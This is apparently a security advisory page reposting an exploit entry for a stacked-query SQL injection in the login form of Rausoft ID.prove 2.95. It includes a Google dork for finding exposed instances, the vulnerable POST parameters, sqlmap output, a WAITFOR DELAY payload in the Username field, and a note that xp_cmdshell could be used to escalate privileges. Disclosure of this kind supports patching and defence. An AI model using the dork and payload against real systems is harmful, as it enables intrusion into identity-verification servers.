Rausoft ID.prove 2.95 SQL Injection

2018.09.29
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Rausoft ID.prove 2.95 - 'Username' SQL injection # Google Dork: inurl:IdproveWebclient # Date: 2018-09-26 # Exploit Author: Ilya Timchenko, Mercedes pay S.A. # Vendor Homepage: https://www.idprove.de # Software Link: https://www.idprove.de/english/index.php?option=com_content&view=article&id=17&Itemid=3 # Version: 2.95 # Tested on: Windows 2016 # CVE : N/A # Description: An issue was discovered in Rausoft ID.prove 2.95. The login page with a field "Username" # https://<<FQDN>>/IdproveWebclient/Account/Login?ReturnUrl=%2fIdproveWebclient%2fEinzelsuche --data="__RequestVerificationToken=<<dynamic_token_value>>&Username=a&PasswordTemp=a" # is vulnerable to the SQL injection via Microsoft SQL Server stacked queries in the Username POST parameter. # Hypothetically, an attacker can utilize master..xp_cmdshell for the further privilege elevation. # SQLmap output: # Parameter: #1* ((custom) POST) # Type: stacked queries # Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: __RequestVerificationToken=<<dynamic_token_value>>&Username=a';WAITFOR DELAY '0:0:5'--&PasswordTemp=a


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top